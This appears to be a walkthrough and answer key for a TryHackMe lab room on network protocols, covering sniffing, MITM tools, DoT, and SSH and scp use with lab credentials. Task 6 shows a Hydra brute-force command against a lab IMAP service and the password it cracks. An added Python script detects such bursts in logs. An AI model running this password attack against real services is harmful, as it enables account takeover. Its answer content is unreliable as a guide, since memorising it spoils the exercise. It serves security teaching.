https://tryhackme.com/room/protocolsandservers2

Task 1 Introduction

No questions in this task.

Task 2 Sniffing Attack

Frage 1:
What do you need to add to the command sudo tcpdump to capture only Telnet traffic?

Telnet runs on port 23, so a capture filter on that port is enough.

Antwort 1:
port 23

Frage 2:
What is the simplest display filter you can use with Wireshark to show only IMAP traffic?

In Wireshark the protocol's usual name works directly as a display filter.

Antwort 2:
imap

Task 3 Man-in-the-Middle (MITM) Attack

Frage 1:
How many different interfaces does Ettercap offer?

We need to visit the Ettercap website and read up on Ettercap a little.

Antwort 1:
3

Frage 2:
In how many ways can you invoke Bettercap?

We need to visit the Bettercap website and read up on Bettercap a little.

Antwort 2:
3

Task 4 Transport Layer Security (TLS)

Frage 1:
DNS can also be secured using TLS. What is the three-letter acronym of the DNS protocol that uses TLS?

This question requires a bit of research. The acronym we are looking for is formed from DNS over TLS (DoT).

Antwort 1:
DoT

Task 5 Secure Shell (SSH)

Frage 1:
Use SSH to connect to 10.10.19.155 as mark with the password XBtc49AB. Using uname -r, find the Kernel release?

└─$ ssh mark@10.10.19.155                          
The authenticity of host '10.10.19.155 (10.10.19.155)' can't be established.
ED25519 key fingerprint is SHA256:4UOWo7gUWFiNuFQIBMTV3Ltoc6FqZcgLeK6eFr+7paU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.19.155' (ED25519) to the list of known hosts.
mark@10.10.19.155's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-84-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 13 Oct 2022 04:30:08 PM UTC

  System load:  0.08              Processes:             128
  Usage of /:   40.6% of 6.53GB   Users logged in:       0
  Memory usage: 23%               IPv4 address for eth0: 10.10.19.155
  Swap usage:   0%

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Sep 20 13:36:07 2021 from 10.20.30.1
mark@bento:~$ uname -r
5.4.0-84-generic

Antwort 1:
5.4.0-84-generic

Frage 2:
Use SSH to download the file book.txt from the remote system. How many KBs did scp display as download size?

mark@bento:~$ scp mark@10.10.19.155:/home/mark/book.txt ~
The authenticity of host '10.10.19.155 (10.10.19.155)' can't be established.
ECDSA key fingerprint is SHA256:a/jk5FKco5HKrL5orT81CFrihZusu13zJW+NsL4QG/g.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.19.155' (ECDSA) to the list of known hosts.
mark@10.10.19.155's password: 
book.txt                                                                                                                       100%  415KB  69.3MB/s   00:00    
mark@bento:~$ 

Antwort 2:
415

Task 6 Password Attack

Frage 1:
We learned that one of the email accounts is lazie. What is the password used to access the IMAP service on 10.10.19.155?

So here we use Hydra and put together a command. The wordlist may live at a different path on your system, depending on where it is stored.

└─$ hydra -l lazie -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt 10.10.19.155 imap
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-10-13 18:46:59
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking imap://10.10.19.155:143/
[143][imap] host: 10.10.19.155   login: lazie   password: butterfly
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-10-13 18:47:20

Antwort 1:
butterfly
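
Added here as a defender-side illustration, not part of the original walkthrough and not Hydra's own code: a Python script that flags a password-guessing burst against the IMAP service, like the one above, in the mail server's authentication log. It assumes Dovecot-style imap-login syslog lines; the sample log is constructed, and the source address 10.10.50.7 is a placeholder.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log in a Dovecot-style syslog layout (assumed format, not captured in the room):
# five failed PLAIN logins for "lazie" from one source within seconds, then a success, plus one unrelated failure.
SAMPLE_LOG = """\
Oct 13 18:46:59 bento dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<lazie>, method=PLAIN, rip=10.10.50.7, lip=10.10.19.155
Oct 13 18:47:00 bento dovecot: imap-login: Disconnected (auth failed, 1 attempts in 1 secs): user=<lazie>, method=PLAIN, rip=10.10.50.7, lip=10.10.19.155
Oct 13 18:47:02 bento dovecot: imap-login: Disconnected (auth failed, 1 attempts in 1 secs): user=<lazie>, method=PLAIN, rip=10.10.50.7, lip=10.10.19.155
Oct 13 18:47:05 bento dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<lazie>, method=PLAIN, rip=10.10.50.7, lip=10.10.19.155
Oct 13 18:47:09 bento dovecot: imap-login: Disconnected (auth failed, 1 attempts in 1 secs): user=<lazie>, method=PLAIN, rip=10.10.50.7, lip=10.10.19.155
Oct 13 18:47:20 bento dovecot: imap-login: Login: user=<lazie>, method=PLAIN, rip=10.10.50.7, lip=10.10.19.155
Oct 13 18:50:41 bento dovecot: imap-login: Disconnected (auth failed, 1 attempts in 3 secs): user=<mark>, method=PLAIN, rip=10.20.30.1, lip=10.10.19.155
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ dovecot: imap-login: "
    r"(?P<event>Disconnected \(auth failed|Login).*?user=<(?P<user>[^>]*)>.*?rip=(?P<rip>[\d.]+)"
)

def parse_line(line):
    """Return (timestamp, 'fail'|'success', user, source_ip) for an imap-login line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(re.sub(r"\s+", " ", m["ts"]), "%b %d %H:%M:%S")  # syslog has no year
    event = "fail" if m["event"].startswith("Disconnected") else "success"
    return ts, event, m["user"], m["rip"]

def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Flag (source_ip, user) pairs with >= threshold failures inside any window_seconds span,
    and note whether a successful login followed the burst (credential probably guessed)."""
    fails, successes = defaultdict(list), defaultdict(list)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, event, user, rip = parsed
        (fails if event == "fail" else successes)[(rip, user)].append(ts)
    alerts = []
    for key, times in fails.items():
        times.sort()
        start = 0
        for end in range(len(times)):  # sliding window over sorted failure times
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                followed = any(s >= times[end] for s in successes.get(key, []))
                alerts.append({"rip": key[0], "user": key[1], "failures": end - start + 1,
                               "success_after_burst": followed})
                break
    return alerts
```

A burst followed by a success is the case worth escalating: it is the log-side shadow of the "1 valid password found" line in Hydra's output.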

Task 7 Summary

No questions in this task.